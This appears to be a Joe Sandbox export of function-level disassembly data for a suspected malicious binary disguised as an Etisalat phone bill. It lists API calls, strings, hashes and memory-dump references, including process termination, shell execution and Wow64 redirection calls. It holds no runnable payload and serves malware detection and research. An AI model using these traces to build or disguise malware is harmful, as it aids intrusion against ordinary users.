Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: fba65aa90e58e0a0be1d204712342705fdbc6874a6f478a486dba257769fbd58
Instruction ID: ee4e9c7714fa456b3c399a60ebdf2661d027135d9cf88ce07fc5c71e7df34a21
Opcode Fuzzy Hash: fba65aa90e58e0a0be1d204712342705fdbc6874a6f478a486dba257769fbd58
Instruction Fuzzy Hash: 24F0A971508A046BC212373D6C06E2A2756FBE27A5F25471BF864D23D1EF6488016262

Function 00938A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 008B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008B9693
Part of subcall function 008B9639: SelectObject.GDI32(?,00000000), ref: 008B96A2
Part of subcall function 008B9639: BeginPath.GDI32(?), ref: 008B96B9
Part of subcall function 008B9639: SelectObject.GDI32(?,00000000), ref: 008B96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00938A4E
LineTo.GDI32(?,00000003,00000000), ref: 00938A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00938A70
LineTo.GDI32(?,00000000,00000003), ref: 00938A80
EndPath.GDI32(?), ref: 00938A90
StrokePath.GDI32(?), ref: 00938AA0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: f07d18d362f9ff86a308a5187f66bcf1a156aeb41aa58cfa82d3b4add4193b3d
Instruction ID: 16586adb1e84b40fe933af3cb8e8e4e4b06f4550021e6b8db98e486d47d56747
Opcode Fuzzy Hash: f07d18d362f9ff86a308a5187f66bcf1a156aeb41aa58cfa82d3b4add4193b3d
Instruction Fuzzy Hash: 96111B7601454CFFDF129F94DC88EAA7F6DEB08390F008012FA19AA1A1C7719D55EFA0

Function 009051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00905218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00905229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00905230
ReleaseDC.USER32(00000000,00000000), ref: 00905238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0090524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00905261

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 167cc44d116802eb4485962bc01cac0af4c062c7f27d7a48ee864a8668f3e5d9
Instruction ID: d2545a954d8b02b6094a04b6056d49ebc4768bf4c1d21e3f150a2b9239a4ec61
Opcode Fuzzy Hash: 167cc44d116802eb4485962bc01cac0af4c062c7f27d7a48ee864a8668f3e5d9
Instruction Fuzzy Hash: A8014FB5A04B19BBEB109BA99C49A5EBFB8EF48751F044065FA04F7291DA709C00DFA0

Function 008A1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 008A1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 008A1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 008A1C22

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: eb24e6d3ff6dbcc9dac1410533ba595d62a8b5767a51c6233968cf1710c0ddb0
Instruction ID: 5ed4f2b734faaf2c920252cb2c010ce5ca459c47fe71eeed20cce87d707465be
Opcode Fuzzy Hash: eb24e6d3ff6dbcc9dac1410533ba595d62a8b5767a51c6233968cf1710c0ddb0
Instruction Fuzzy Hash: 660167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CFE5

Function 0090EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0090EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0090EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0090EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0090EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0090EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0090EB75

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d2d009bddcc6fa5afea3f255b6f49026e764261bec1b711acb0c22c2a9f9fd71
Instruction ID: 3fea2bcf98804e006c48cc18b4bbb8cb624ac77e2602b644c8ae76f13124b8bd
Opcode Fuzzy Hash: d2d009bddcc6fa5afea3f255b6f49026e764261bec1b711acb0c22c2a9f9fd71
Instruction Fuzzy Hash: 03F03AB2254959BBE7215BA29C0EEEF3A7CEFCAB15F004158F601E1091D7A05A01EBB5

Function 008F7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 008F7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 008F7469
GetWindowDC.USER32(?), ref: 008F7475
GetPixel.GDI32(00000000,?,?), ref: 008F7484
ReleaseDC.USER32(?,00000000), ref: 008F7496
GetSysColor.USER32(00000005), ref: 008F74B0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 9d05f8e344646797a0da5802384d00a846a238a6cab6adc734459fbedd8ba787
Instruction ID: 05e6577d1c9c5c5daaec36daa2e9af429b75de8f145fd3de95bb41e6682b566d
Opcode Fuzzy Hash: 9d05f8e344646797a0da5802384d00a846a238a6cab6adc734459fbedd8ba787
Instruction Fuzzy Hash: 08018B72418A09FFEB105FA4DC09BAA7BB5FB04315F100060FA15A21A0CB311E51BF10

Function 00901874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0090187F
UnloadUserProfile.USERENV(?,?), ref: 0090188B
CloseHandle.KERNEL32(?), ref: 00901894
CloseHandle.KERNEL32(?), ref: 0090189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009018A5
HeapFree.KERNEL32(00000000), ref: 009018AC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7fdadb07fe35a711cc0acc92d4fb4e535cc39ff4711932a9dfd5e7fc3efd19a1
Instruction ID: 4c90c6e28d5282f7e7a2b42856ca850415b3a6c538a6ae5b258bf4b38ac6df8e
Opcode Fuzzy Hash: 7fdadb07fe35a711cc0acc92d4fb4e535cc39ff4711932a9dfd5e7fc3efd19a1
Instruction Fuzzy Hash: 41E0C2B6018901BBDA015BE1ED0C90ABB29FB49B22B108220F225A1070CB329430FF50

Function 0090C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A7620: _wcslen.LIBCMT ref: 008A7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0090C6EE
_wcslen.LIBCMT ref: 0090C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0090C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0090C7CA

Strings

0, xrefs: 0090C6AF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 8ad2eacaf564e054929ea7b828d6bb47a1b46f19961da9801513293bf484a04e
Instruction ID: 4d342003d2f7a1be2124c3705cad8c28f86f589ad9c2fcb1fb4f01d8c875e2cc
Opcode Fuzzy Hash: 8ad2eacaf564e054929ea7b828d6bb47a1b46f19961da9801513293bf484a04e
Instruction Fuzzy Hash: 5151CEB26183019FD7249F28C885B6B77E8EF89310F040B2DF995E32E1DB74D9449B52

Function 0092AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0092AEA3

Part of subcall function 008A7620: _wcslen.LIBCMT ref: 008A7625

GetProcessId.KERNEL32(00000000), ref: 0092AF38
CloseHandle.KERNEL32(00000000), ref: 0092AF67

Strings

@, xrefs: 0092AE72
<, xrefs: 0092AE6B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 601f43314d80b76e60221ed46815f4d4c0e3b7b6d58abc98cb87f60fdcbc4cf7
Instruction ID: 118e2a946243ac8a824a530de45e6de88a873aa4f3101c2b8cdd895e22179ca2
Opcode Fuzzy Hash: 601f43314d80b76e60221ed46815f4d4c0e3b7b6d58abc98cb87f60fdcbc4cf7
Instruction Fuzzy Hash: 46719B71A00625DFDB14EF58D484A9EBBF4FF09300F048499E816AB7A2CB74ED45CB92

Function 0090719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00907206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0090723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0090724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009072CF

Strings

DllGetClassObject, xrefs: 00907242

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 5281702a46e59a73c2745009420f5576f8e905fa5e2273b69f0b8a61f2be0fb9
Instruction ID: 33bdcd2cf5a8beda71de7d0ddd723e91eca7cfbbc63198ea2523feb09fddf82e
Opcode Fuzzy Hash: 5281702a46e59a73c2745009420f5576f8e905fa5e2273b69f0b8a61f2be0fb9
Instruction Fuzzy Hash: 2F4186B1904204EFDB15CF98C884B9ABBB9EF44320F1584A9BD159F24AD7B0ED44DBA0

Function 00901DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 00903CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00903CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00901E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00901E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00901EA9

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

Strings

ComboBox, xrefs: 00901DF0
ListBox, xrefs: 00901E25

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 0a28d133e7269465d58d9800e56822984174d796e2b4cfbb461d5115a7f8231a
Instruction ID: 49f602dccf5e06a98654c4f7b552add4ce1acc879394de007e25ced2975f22b6
Opcode Fuzzy Hash: 0a28d133e7269465d58d9800e56822984174d796e2b4cfbb461d5115a7f8231a
Instruction Fuzzy Hash: 8321B571A00104BFEB14AB68DC46CFFB7BDEF46364B144529F865E71E1DB384A0A9A20

Function 00932F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00932F8D
LoadLibraryW.KERNEL32(?), ref: 00932F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00932FA9
DestroyWindow.USER32(?), ref: 00932FB1

Strings

SysAnimate32, xrefs: 00932F68

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: bd191d559ebb069c31b2e6b20986c906c5acbc243e40a4a379bd2c44b40b68b1
Instruction ID: 6092be820a0190795863df689e5635504daeedd24efab0f5da4531348d8328c1
Opcode Fuzzy Hash: bd191d559ebb069c31b2e6b20986c906c5acbc243e40a4a379bd2c44b40b68b1
Instruction Fuzzy Hash: 7E219D72214205ABEB114FA4DC81FBB7BBDEF59368F104618FA50E61A0D771DC91AF60

Function 008C4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008C4D1E,008D28E9,?,008C4CBE,008D28E9,009688B8,0000000C,008C4E15,008D28E9,00000002), ref: 008C4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008C4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,008C4D1E,008D28E9,?,008C4CBE,008D28E9,009688B8,0000000C,008C4E15,008D28E9,00000002,00000000), ref: 008C4DC3

Strings

CorExitProcess, xrefs: 008C4D98
mscoree.dll, xrefs: 008C4D86

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 07d7f7a75e1b849285b719a3ebad5fdce6aea5e738b8ae93d07ca0c29ed9441b
Instruction ID: e92002d9f51b6e272be3538c7711bb9f5afc5cabf50b755815dfa757644739fa
Opcode Fuzzy Hash: 07d7f7a75e1b849285b719a3ebad5fdce6aea5e738b8ae93d07ca0c29ed9441b
Instruction Fuzzy Hash: F2F0AF75A14208BBDB109F90DC09FADBBB5EF44751F0000A8FA06E2260CB709A80EF91

Function 008A4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,008A4EDD,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008A4EAE
FreeLibrary.KERNEL32(00000000,?,?,008A4EDD,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4EC0

Strings

kernel32.dll, xrefs: 008A4E94
Wow64DisableWow64FsRedirection, xrefs: 008A4EA8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: ec66fdffab3810a85c8d2bfd32194bb62b0b4f4269be21cc70fb0a9df67703bb
Instruction ID: 813dfe94f731920a829d359a3ed41e22d8cbfbb5d8e1d6021af4514a59ad5b46
Opcode Fuzzy Hash: ec66fdffab3810a85c8d2bfd32194bb62b0b4f4269be21cc70fb0a9df67703bb
Instruction Fuzzy Hash: 98E08676A199225BA72117656C18A5B6554FFC2B72B050115FD05F2100DBA0CD01AAE1

Function 008A4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E3CDE,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008A4E74
FreeLibrary.KERNEL32(00000000,?,?,008E3CDE,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4E87

Strings

kernel32.dll, xrefs: 008A4E5B
Wow64RevertWow64FsRedirection, xrefs: 008A4E6E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 103a80e717c7146643b55378db3e1bac2734388915f6ceaf4b296caa59f14f1f
Instruction ID: 64fb1c674ce9a11f7f3afd8d42db19c03e60af0f256221b3bc12a300d9172031
Opcode Fuzzy Hash: 103a80e717c7146643b55378db3e1bac2734388915f6ceaf4b296caa59f14f1f
Instruction Fuzzy Hash: E8D0C23651AE21576A221B247C08D8B6A18FFC2B253450111B805F2110CFA0CD11EAD0

Function 0092A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0092A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0092A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0092A468
CloseHandle.KERNEL32(?), ref: 0092A63D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 5d76207a7855f05f5ae80b06f1d18a7c6b238955a2b689a3d550f0b315ada58c
Instruction ID: d3cad6daf184deeb77367f2964e4f9fb2bffd8e00590b9701d046af671069547
Opcode Fuzzy Hash: 5d76207a7855f05f5ae80b06f1d18a7c6b238955a2b689a3d550f0b315ada58c
Instruction Fuzzy Hash: 18A17B716047009FE720DF28D886F2AB7E5AB84714F14881DF55ADB792DBB0EC418B92

Function 008DBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00943700), ref: 008DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0097121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00971270,000000FF,?,0000003F,00000000,?), ref: 008DBC36
_free.LIBCMT ref: 008DBB7F

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

_free.LIBCMT ref: 008DBD4B

Memory Dump Source

